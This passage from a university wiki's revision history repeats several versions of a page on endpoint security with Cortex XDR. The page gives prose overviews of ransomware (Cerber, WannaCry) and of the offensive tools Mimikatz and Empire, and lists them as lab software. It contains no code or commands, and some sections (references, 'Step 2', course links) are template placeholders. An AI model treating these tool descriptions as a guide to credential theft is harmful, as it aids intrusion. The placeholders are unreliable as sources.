Cortex XDR is a security solution developed by Palo Alto Networks that provides advanced threat detection and response capabilities. It combines multiple security technologies, including endpoint protection, network security, and cloud-based threat intelligence, to provide a comprehensive view of an organization&#039;s security posture.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses machine learning and behavioral analytics to detect and respond to advanced threats, such as ransomware and APTs (Advanced Persistent Threats), in real-time. The platform also allows for automated incident response, which enables security teams to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR also integrates with other security solutions, such as firewalls, to provide a unified view of security across an organization&#039;s entire infrastructure. This allows security teams to quickly identify and respond to threats, even if they are spread across multiple systems and networks.&lt;br /&gt;
&lt;br /&gt;
The Cortex XDR platform also includes a cloud-based management console, which enables security teams to monitor and manage security across multiple locations and devices. It allows security teams to identify, investigate and respond to security incidents across all users, devices, and networks with a single console.&lt;br /&gt;
&lt;br /&gt;
==== Mimikatz ====&lt;br /&gt;
&lt;br /&gt;
Mimikatz is a tool that is used to extract sensitive information, such as login credentials, from Windows systems. The tool is often used by attackers to gain access to systems and networks after they have successfully compromised a system. Mimikatz is able to extract information from the Windows operating system&#039;s memory, and it can be used to extract credentials from a wide range of applications, including web browsers, email clients, and other software.&lt;br /&gt;
&lt;br /&gt;
Mimikatz can extract a variety of information, including:&lt;br /&gt;
&lt;br /&gt;
* Passwords stored in memory&lt;br /&gt;
* Encryption keys&lt;br /&gt;
* Hashes of passwords&lt;br /&gt;
* Kerberos tickets&lt;br /&gt;
* Credentials for services and scheduled tasks&lt;br /&gt;
&lt;br /&gt;
Mimikatz can also be used to perform actions such as:&lt;br /&gt;
&lt;br /&gt;
* Changing a password for a user account&lt;br /&gt;
* Adding new user account&lt;br /&gt;
* Dumping the LSASS process memory.&lt;br /&gt;
&lt;br /&gt;
Mimikatz is considered a powerful and dangerous tool, and its use in an unauthorized manner is illegal in some countries. It is important for organizations to be aware of the presence of Mimikatz and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
==== BC-Security / Empire ====&lt;br /&gt;
&lt;br /&gt;
Empire is a post-exploitation framework, often used by penetration testers and red teamers to perform various tasks on a compromised system. Empire is based on the PowerShell scripting language and it is a popular tool among attackers because of its ability to execute arbitrary PowerShell commands and scripts, and its ability to perform various post-exploitation tasks such as privilege escalation, key logging, and network reconnaissance.&lt;br /&gt;
&lt;br /&gt;
Empire is a modular framework that allows users to easily create and execute custom modules, making it a powerful and flexible tool. Empire also has the ability to communicate with a command and control (C2) server, which can be used to remotely control a compromised system.&lt;br /&gt;
&lt;br /&gt;
Empire is often used in combination with other tools such as Metasploit, Mimikatz, and Cobalt Strike to perform advanced attacks.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to be aware of the presence of Empire and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
Windows 10 OS&lt;br /&gt;
&lt;br /&gt;
== Used Software ==&lt;br /&gt;
&lt;br /&gt;
* Cortex XDR&lt;br /&gt;
* WannaCry Ransomware&lt;br /&gt;
* Cerber Ransomware&lt;br /&gt;
* Gentilkiwi / Mimikatz &lt;br /&gt;
* BC-Security / Empire &lt;br /&gt;
* Porchetta-Industries / CrackMapExec&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
* [[A course where this documentation was used]] (2017, 2018)&lt;br /&gt;
* [[Another one]] (2018)&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11263</id>
		<title>Endpoint security using Cortex XDR</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11263"/>
		<updated>2023-01-28T20:14:30Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Step 2 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Endpoint security is a critical component of an organization&#039;s overall security strategy. It involves protecting devices such as laptops, smartphones, and servers from threats that can compromise the confidentiality, integrity, and availability of sensitive data. Cortex XDR is a next-generation endpoint security solution that provides advanced threat detection and response capabilities to help organizations protect their endpoints from a wide range of threats, including malware, ransomware, and advanced persistent threats (APTs).&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses a combination of artificial intelligence and machine learning algorithms to detect and respond to threats in real-time. It continuously monitors network traffic and endpoints for suspicious activity and immediately alerts security teams to potential threats. Additionally, Cortex XDR provides detailed forensic analysis and incident response capabilities, allowing organizations to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
With Cortex XDR, organizations can proactively protect their endpoints from known and unknown threats, and quickly respond to any incidents that do occur. This helps to minimize the risk of data breaches and ensure that sensitive information remains secure.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR can be used in conjunction with other security solutions, such as firewalls, intrusion detection and prevention systems, and security information and event management (SIEM) platforms, to provide a comprehensive security posture for the organization. It also provides a simplified, centralized management console for security teams to easily manage and monitor their endpoint security posture.&lt;br /&gt;
&lt;br /&gt;
In summary, Cortex XDR is a powerful endpoint security solution that uses artificial intelligence and machine learning to detect and respond to threats in real-time, and provides incident response and forensic analysis capabilities to help organizations quickly contain and remediate threats, while providing a centralized, easy-to-use management console for security teams.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Ransomware ===&lt;br /&gt;
&lt;br /&gt;
Ransomware is a type of malware that encrypts a victim&#039;s files and demands a ransom payment in exchange for the decryption key. The payment is typically demanded in the form of cryptocurrency, such as Bitcoin, and is often accompanied by a deadline for payment. Ransomware is typically spread through phishing emails or by exploiting vulnerabilities in software. It can cause significant financial and operational damage to individuals and organizations.&lt;br /&gt;
&lt;br /&gt;
Ransomware attacks can be particularly damaging to businesses, as they can disrupt operations and result in the loss of important data. In some cases, the ransom may be too high for the organization to afford, and they may be forced to pay it. In other cases, the organization may choose to not pay the ransom and instead restore their systems from backups or try to decrypt the files using other methods. Some Ransomware also have a double extortion mechanism, where they also steal data from the organization and threaten to release it publicly if the ransom is not paid. It is important for individuals and organizations to regularly backup their data and to keep their software and systems up to date to reduce the risk of falling victim to a ransomware attack.&lt;br /&gt;
&lt;br /&gt;
==== Cerber Ransomware ====&lt;br /&gt;
&lt;br /&gt;
Cerber is a type of ransomware that was first discovered in 2016. It is known for its use of advanced tactics to evade detection and to spread to other computers on a network. One of the tactics is the use of exploit kits to take advantage of vulnerabilities in software. It also uses a double extortion mechanism, where it steal data from the organization and threaten to release it publicly if the ransom is not paid.&lt;br /&gt;
Cerber is typically distributed through spam emails or via malicious websites that exploit vulnerabilities in web browsers and other software. Once a computer is infected, the malware encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files.&lt;br /&gt;
It is important to note that paying the ransom does not guarantee the recovery of the encrypted files and it is advisable to try to restore the data from backups or other means.&lt;br /&gt;
&lt;br /&gt;
==== WannaCry Ransomware ==== &lt;br /&gt;
&lt;br /&gt;
WannaCry is a type of ransomware that was first discovered in May 2017. It quickly spread globally, causing widespread disruption to businesses, hospitals and other organizations. WannaCry was notable for its use of a specific exploit called EternalBlue, which was developed by the US National Security Agency (NSA) and leaked to the public by a hacking group called the Shadow Brokers. The exploit targeted a vulnerability in Microsoft Windows operating systems, allowing the ransomware to spread rapidly across networks.&lt;br /&gt;
Once a computer was infected, WannaCry encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files. The ransom payment was demanded in Bitcoin and the attackers threatened to double the ransom if it was not paid within three days.&lt;br /&gt;
WannaCry caused significant damage and disruption to organizations worldwide, and it was estimated that the total cost of the attack exceeded $4 billion. Microsoft had released a patch for the vulnerability before the outbreak, but many systems had not yet been updated, highlighting the importance of keeping software up to date.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Cortex XDR ====&lt;br /&gt;
&lt;br /&gt;
Cortex XDR is a security solution developed by Palo Alto Networks that provides advanced threat detection and response capabilities. It combines multiple security technologies, including endpoint protection, network security, and cloud-based threat intelligence, to provide a comprehensive view of an organization&#039;s security posture.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses machine learning and behavioral analytics to detect and respond to advanced threats, such as ransomware and APTs (Advanced Persistent Threats), in real-time. The platform also allows for automated incident response, which enables security teams to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR also integrates with other security solutions, such as firewalls, to provide a unified view of security across an organization&#039;s entire infrastructure. This allows security teams to quickly identify and respond to threats, even if they are spread across multiple systems and networks.&lt;br /&gt;
&lt;br /&gt;
The Cortex XDR platform also includes a cloud-based management console, which enables security teams to monitor and manage security across multiple locations and devices. It allows security teams to identify, investigate and respond to security incidents across all users, devices, and networks with a single console.&lt;br /&gt;
&lt;br /&gt;
==== Mimikatz ====&lt;br /&gt;
&lt;br /&gt;
Mimikatz is a tool that is used to extract sensitive information, such as login credentials, from Windows systems. The tool is often used by attackers to gain access to systems and networks after they have successfully compromised a system. Mimikatz is able to extract information from the Windows operating system&#039;s memory, and it can be used to extract credentials from a wide range of applications, including web browsers, email clients, and other software.&lt;br /&gt;
&lt;br /&gt;
Mimikatz can extract a variety of information, including:&lt;br /&gt;
&lt;br /&gt;
* Passwords stored in memory&lt;br /&gt;
* Encryption keys&lt;br /&gt;
* Hashes of passwords&lt;br /&gt;
* Kerberos tickets&lt;br /&gt;
* Credentials for services and scheduled tasks&lt;br /&gt;
&lt;br /&gt;
Mimikatz can also be used to perform actions such as:&lt;br /&gt;
&lt;br /&gt;
* Changing a password for a user account&lt;br /&gt;
* Adding new user account&lt;br /&gt;
* Dumping the LSASS process memory.&lt;br /&gt;
&lt;br /&gt;
Mimikatz is considered a powerful and dangerous tool, and its use in an unauthorized manner is illegal in some countries. It is important for organizations to be aware of the presence of Mimikatz and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
Windows 10 OS&lt;br /&gt;
&lt;br /&gt;
== Used Software ==&lt;br /&gt;
&lt;br /&gt;
* Cortex XDR&lt;br /&gt;
* WannaCry Ransomware&lt;br /&gt;
* Cerber Ransomware&lt;br /&gt;
* Gentilkiwi / Mimikatz &lt;br /&gt;
* BC-Security / Empire &lt;br /&gt;
* Porchetta-Industries / CrackMapExec&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
* [[A course where this documentation was used]] (2017, 2018)&lt;br /&gt;
* [[Another one]] (2018)&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11262</id>
		<title>Endpoint security using Cortex XDR</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11262"/>
		<updated>2023-01-28T20:14:04Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Mimikatz */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Endpoint security is a critical component of an organization&#039;s overall security strategy. It involves protecting devices such as laptops, smartphones, and servers from threats that can compromise the confidentiality, integrity, and availability of sensitive data. Cortex XDR is a next-generation endpoint security solution that provides advanced threat detection and response capabilities to help organizations protect their endpoints from a wide range of threats, including malware, ransomware, and advanced persistent threats (APTs).&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses a combination of artificial intelligence and machine learning algorithms to detect and respond to threats in real-time. It continuously monitors network traffic and endpoints for suspicious activity and immediately alerts security teams to potential threats. Additionally, Cortex XDR provides detailed forensic analysis and incident response capabilities, allowing organizations to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
With Cortex XDR, organizations can proactively protect their endpoints from known and unknown threats, and quickly respond to any incidents that do occur. This helps to minimize the risk of data breaches and ensure that sensitive information remains secure.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR can be used in conjunction with other security solutions, such as firewalls, intrusion detection and prevention systems, and security information and event management (SIEM) platforms, to provide a comprehensive security posture for the organization. It also provides a simplified, centralized management console for security teams to easily manage and monitor their endpoint security posture.&lt;br /&gt;
&lt;br /&gt;
In summary, Cortex XDR is a powerful endpoint security solution that uses artificial intelligence and machine learning to detect and respond to threats in real-time, and provides incident response and forensic analysis capabilities to help organizations quickly contain and remediate threats, while providing a centralized, easy-to-use management console for security teams.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Ransomware ===&lt;br /&gt;
&lt;br /&gt;
Ransomware is a type of malware that encrypts a victim&#039;s files and demands a ransom payment in exchange for the decryption key. The payment is typically demanded in the form of cryptocurrency, such as Bitcoin, and is often accompanied by a deadline for payment. Ransomware is typically spread through phishing emails or by exploiting vulnerabilities in software. It can cause significant financial and operational damage to individuals and organizations.&lt;br /&gt;
&lt;br /&gt;
Ransomware attacks can be particularly damaging to businesses, as they can disrupt operations and result in the loss of important data. In some cases, the ransom may be too high for the organization to afford, and they may be forced to pay it. In other cases, the organization may choose to not pay the ransom and instead restore their systems from backups or try to decrypt the files using other methods. Some Ransomware also have a double extortion mechanism, where they also steal data from the organization and threaten to release it publicly if the ransom is not paid. It is important for individuals and organizations to regularly backup their data and to keep their software and systems up to date to reduce the risk of falling victim to a ransomware attack.&lt;br /&gt;
&lt;br /&gt;
==== Cerber Ransomware ====&lt;br /&gt;
&lt;br /&gt;
Cerber is a type of ransomware that was first discovered in 2016. It is known for its use of advanced tactics to evade detection and to spread to other computers on a network. One of the tactics is the use of exploit kits to take advantage of vulnerabilities in software. It also uses a double extortion mechanism, where it steal data from the organization and threaten to release it publicly if the ransom is not paid.&lt;br /&gt;
Cerber is typically distributed through spam emails or via malicious websites that exploit vulnerabilities in web browsers and other software. Once a computer is infected, the malware encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files.&lt;br /&gt;
It is important to note that paying the ransom does not guarantee the recovery of the encrypted files and it is advisable to try to restore the data from backups or other means.&lt;br /&gt;
&lt;br /&gt;
==== WannaCry Ransomware ==== &lt;br /&gt;
&lt;br /&gt;
WannaCry is a type of ransomware that was first discovered in May 2017. It quickly spread globally, causing widespread disruption to businesses, hospitals and other organizations. WannaCry was notable for its use of a specific exploit called EternalBlue, which was developed by the US National Security Agency (NSA) and leaked to the public by a hacking group called the Shadow Brokers. The exploit targeted a vulnerability in Microsoft Windows operating systems, allowing the ransomware to spread rapidly across networks.&lt;br /&gt;
Once a computer was infected, WannaCry encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files. The ransom payment was demanded in Bitcoin and the attackers threatened to double the ransom if it was not paid within three days.&lt;br /&gt;
WannaCry caused significant damage and disruption to organizations worldwide, and it was estimated that the total cost of the attack exceeded $4 billion. Microsoft had released a patch for the vulnerability before the outbreak, but many systems had not yet been updated, highlighting the importance of keeping software up to date.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Cortex XDR ====&lt;br /&gt;
&lt;br /&gt;
Cortex XDR is a security solution developed by Palo Alto Networks that provides advanced threat detection and response capabilities. It combines multiple security technologies, including endpoint protection, network security, and cloud-based threat intelligence, to provide a comprehensive view of an organization&#039;s security posture.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses machine learning and behavioral analytics to detect and respond to advanced threats, such as ransomware and APTs (Advanced Persistent Threats), in real-time. The platform also allows for automated incident response, which enables security teams to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR also integrates with other security solutions, such as firewalls, to provide a unified view of security across an organization&#039;s entire infrastructure. This allows security teams to quickly identify and respond to threats, even if they are spread across multiple systems and networks.&lt;br /&gt;
&lt;br /&gt;
The Cortex XDR platform also includes a cloud-based management console, which enables security teams to monitor and manage security across multiple locations and devices. It allows security teams to identify, investigate and respond to security incidents across all users, devices, and networks with a single console.&lt;br /&gt;
&lt;br /&gt;
==== Mimikatz ====&lt;br /&gt;
&lt;br /&gt;
Mimikatz is a tool that is used to extract sensitive information, such as login credentials, from Windows systems. The tool is often used by attackers to gain access to systems and networks after they have successfully compromised a system. Mimikatz is able to extract information from the Windows operating system&#039;s memory, and it can be used to extract credentials from a wide range of applications, including web browsers, email clients, and other software.&lt;br /&gt;
&lt;br /&gt;
Mimikatz can extract a variety of information, including:&lt;br /&gt;
&lt;br /&gt;
* Passwords stored in memory&lt;br /&gt;
* Encryption keys&lt;br /&gt;
* Hashes of passwords&lt;br /&gt;
* Kerberos tickets&lt;br /&gt;
* Credentials for services and scheduled tasks&lt;br /&gt;
&lt;br /&gt;
Mimikatz can also be used to perform actions such as:&lt;br /&gt;
&lt;br /&gt;
* Changing a password for a user account&lt;br /&gt;
* Adding new user account&lt;br /&gt;
* Dumping the LSASS process memory.&lt;br /&gt;
&lt;br /&gt;
Mimikatz is considered a powerful and dangerous tool, and its use in an unauthorized manner is illegal in some countries. It is important for organizations to be aware of the presence of Mimikatz and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
Make sure to read&lt;br /&gt;
&lt;br /&gt;
* War and Peace&lt;br /&gt;
* Lord of the Rings&lt;br /&gt;
* The Baroque Cycle&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
Windows 10 OS&lt;br /&gt;
&lt;br /&gt;
== Used Software ==&lt;br /&gt;
&lt;br /&gt;
* Cortex XDR&lt;br /&gt;
* WannaCry Ransomware&lt;br /&gt;
* Cerber Ransomware&lt;br /&gt;
* Gentilkiwi / Mimikatz &lt;br /&gt;
* BC-Security / Empire &lt;br /&gt;
* Porchetta-Industries / CrackMapExec&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
* [[A course where this documentation was used]] (2017, 2018)&lt;br /&gt;
* [[Another one]] (2018)&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11261</id>
		<title>Endpoint security using Cortex XDR</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11261"/>
		<updated>2023-01-28T20:13:27Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Cortex XDR */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Endpoint security is a critical component of an organization&#039;s overall security strategy. It involves protecting devices such as laptops, smartphones, and servers from threats that can compromise the confidentiality, integrity, and availability of sensitive data. Cortex XDR is a next-generation endpoint security solution that provides advanced threat detection and response capabilities to help organizations protect their endpoints from a wide range of threats, including malware, ransomware, and advanced persistent threats (APTs).&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses a combination of artificial intelligence and machine learning algorithms to detect and respond to threats in real-time. It continuously monitors network traffic and endpoints for suspicious activity and immediately alerts security teams to potential threats. Additionally, Cortex XDR provides detailed forensic analysis and incident response capabilities, allowing organizations to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
With Cortex XDR, organizations can proactively protect their endpoints from known and unknown threats, and quickly respond to any incidents that do occur. This helps to minimize the risk of data breaches and ensure that sensitive information remains secure.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR can be used in conjunction with other security solutions, such as firewalls, intrusion detection and prevention systems, and security information and event management (SIEM) platforms, to provide a comprehensive security posture for the organization. It also provides a simplified, centralized management console for security teams to easily manage and monitor their endpoint security posture.&lt;br /&gt;
&lt;br /&gt;
In summary, Cortex XDR is a powerful endpoint security solution that uses artificial intelligence and machine learning to detect and respond to threats in real-time, and provides incident response and forensic analysis capabilities to help organizations quickly contain and remediate threats, while providing a centralized, easy-to-use management console for security teams.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Ransomware ===&lt;br /&gt;
&lt;br /&gt;
Ransomware is a type of malware that encrypts a victim&#039;s files and demands a ransom payment in exchange for the decryption key. The payment is typically demanded in the form of cryptocurrency, such as Bitcoin, and is often accompanied by a deadline for payment. Ransomware is typically spread through phishing emails or by exploiting vulnerabilities in software. It can cause significant financial and operational damage to individuals and organizations.&lt;br /&gt;
&lt;br /&gt;
Ransomware attacks can be particularly damaging to businesses, as they can disrupt operations and result in the loss of important data. In some cases, the ransom may be too high for the organization to afford, and they may be forced to pay it. In other cases, the organization may choose to not pay the ransom and instead restore their systems from backups or try to decrypt the files using other methods. Some Ransomware also have a double extortion mechanism, where they also steal data from the organization and threaten to release it publicly if the ransom is not paid. It is important for individuals and organizations to regularly backup their data and to keep their software and systems up to date to reduce the risk of falling victim to a ransomware attack.&lt;br /&gt;
&lt;br /&gt;
==== Cerber Ransomware ====&lt;br /&gt;
&lt;br /&gt;
Cerber is a type of ransomware that was first discovered in 2016. It is known for its use of advanced tactics to evade detection and to spread to other computers on a network. One of the tactics is the use of exploit kits to take advantage of vulnerabilities in software. It also uses a double extortion mechanism, where it steal data from the organization and threaten to release it publicly if the ransom is not paid.&lt;br /&gt;
Cerber is typically distributed through spam emails or via malicious websites that exploit vulnerabilities in web browsers and other software. Once a computer is infected, the malware encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files.&lt;br /&gt;
It is important to note that paying the ransom does not guarantee the recovery of the encrypted files and it is advisable to try to restore the data from backups or other means.&lt;br /&gt;
&lt;br /&gt;
==== WannaCry Ransomware ==== &lt;br /&gt;
&lt;br /&gt;
WannaCry is a type of ransomware that was first discovered in May 2017. It quickly spread globally, causing widespread disruption to businesses, hospitals and other organizations. WannaCry was notable for its use of a specific exploit called EternalBlue, which was developed by the US National Security Agency (NSA) and leaked to the public by a hacking group called the Shadow Brokers. The exploit targeted a vulnerability in Microsoft Windows operating systems, allowing the ransomware to spread rapidly across networks.&lt;br /&gt;
Once a computer was infected, WannaCry encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files. The ransom payment was demanded in Bitcoin and the attackers threatened to double the ransom if it was not paid within three days.&lt;br /&gt;
WannaCry caused significant damage and disruption to organizations worldwide, and it was estimated that the total cost of the attack exceeded $4 billion. Microsoft had released a patch for the vulnerability before the outbreak, but many systems had not yet been updated, highlighting the importance of keeping software up to date.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Cortex XDR ====&lt;br /&gt;
&lt;br /&gt;
Cortex XDR is a security solution developed by Palo Alto Networks that provides advanced threat detection and response capabilities. It combines multiple security technologies, including endpoint protection, network security, and cloud-based threat intelligence, to provide a comprehensive view of an organization&#039;s security posture.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses machine learning and behavioral analytics to detect and respond to advanced threats, such as ransomware and APTs (Advanced Persistent Threats), in real-time. The platform also allows for automated incident response, which enables security teams to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR also integrates with other security solutions, such as firewalls, to provide a unified view of security across an organization&#039;s entire infrastructure. This allows security teams to quickly identify and respond to threats, even if they are spread across multiple systems and networks.&lt;br /&gt;
&lt;br /&gt;
The Cortex XDR platform also includes a cloud-based management console, which enables security teams to monitor and manage security across multiple locations and devices. It allows security teams to identify, investigate and respond to security incidents across all users, devices, and networks with a single console.&lt;br /&gt;
&lt;br /&gt;
==== Mimikatz ====&lt;br /&gt;
&lt;br /&gt;
Mimikatz is a tool that is used to extract sensitive information, such as login credentials, from Windows systems. The tool is often used by attackers to gain access to systems and networks after they have successfully compromised a system. Mimikatz is able to extract information from the Windows operating system&#039;s memory, and it can be used to extract credentials from a wide range of applications, including web browsers, email clients, and other software.&lt;br /&gt;
&lt;br /&gt;
Mimikatz can extract a variety of information, including:&lt;br /&gt;
&lt;br /&gt;
Passwords stored in memory&lt;br /&gt;
Encryption keys&lt;br /&gt;
Hashes of passwords&lt;br /&gt;
Kerberos tickets&lt;br /&gt;
Credentials for services and scheduled tasks&lt;br /&gt;
Mimikatz can also be used to perform actions such as:&lt;br /&gt;
&lt;br /&gt;
Changing a password for a user account&lt;br /&gt;
Adding new user account&lt;br /&gt;
Dumping the LSASS process memory.&lt;br /&gt;
Mimikatz is considered a powerful and dangerous tool, and its use in an unauthorized manner is illegal in some countries. It is important for organizations to be aware of the presence of Mimikatz and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
Make sure to read&lt;br /&gt;
&lt;br /&gt;
* War and Peace&lt;br /&gt;
* Lord of the Rings&lt;br /&gt;
* The Baroque Cycle&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
Windows 10 OS&lt;br /&gt;
&lt;br /&gt;
== Used Software ==&lt;br /&gt;
&lt;br /&gt;
* Cortex XDR&lt;br /&gt;
* WannaCry Ransomware&lt;br /&gt;
* Cerber Ransomware&lt;br /&gt;
* Gentilkiwi / Mimikatz &lt;br /&gt;
* BC-Security / Empire &lt;br /&gt;
* Porchetta-Industries / CrackMapExec&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
* [[A course where this documentation was used]] (2017, 2018)&lt;br /&gt;
* [[Another one]] (2018)&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11256</id>
		<title>Endpoint security using Cortex XDR</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11256"/>
		<updated>2023-01-28T20:12:27Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* WannaCry Ransomware */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Endpoint security is a critical component of an organization&#039;s overall security strategy. It involves protecting devices such as laptops, smartphones, and servers from threats that can compromise the confidentiality, integrity, and availability of sensitive data. Cortex XDR is a next-generation endpoint security solution that provides advanced threat detection and response capabilities to help organizations protect their endpoints from a wide range of threats, including malware, ransomware, and advanced persistent threats (APTs).&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses a combination of artificial intelligence and machine learning algorithms to detect and respond to threats in real-time. It continuously monitors network traffic and endpoints for suspicious activity and immediately alerts security teams to potential threats. Additionally, Cortex XDR provides detailed forensic analysis and incident response capabilities, allowing organizations to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
With Cortex XDR, organizations can proactively protect their endpoints from known and unknown threats, and quickly respond to any incidents that do occur. This helps to minimize the risk of data breaches and ensure that sensitive information remains secure.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR can be used in conjunction with other security solutions, such as firewalls, intrusion detection and prevention systems, and security information and event management (SIEM) platforms, to provide a comprehensive security posture for the organization. It also provides a simplified, centralized management console for security teams to easily manage and monitor their endpoint security posture.&lt;br /&gt;
&lt;br /&gt;
In summary, Cortex XDR is a powerful endpoint security solution that uses artificial intelligence and machine learning to detect and respond to threats in real-time, and provides incident response and forensic analysis capabilities to help organizations quickly contain and remediate threats, while providing a centralized, easy-to-use management console for security teams.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Ransomware ===&lt;br /&gt;
&lt;br /&gt;
Ransomware is a type of malware that encrypts a victim&#039;s files and demands a ransom payment in exchange for the decryption key. The payment is typically demanded in the form of cryptocurrency, such as Bitcoin, and is often accompanied by a deadline for payment. Ransomware is typically spread through phishing emails or by exploiting vulnerabilities in software. It can cause significant financial and operational damage to individuals and organizations.&lt;br /&gt;
&lt;br /&gt;
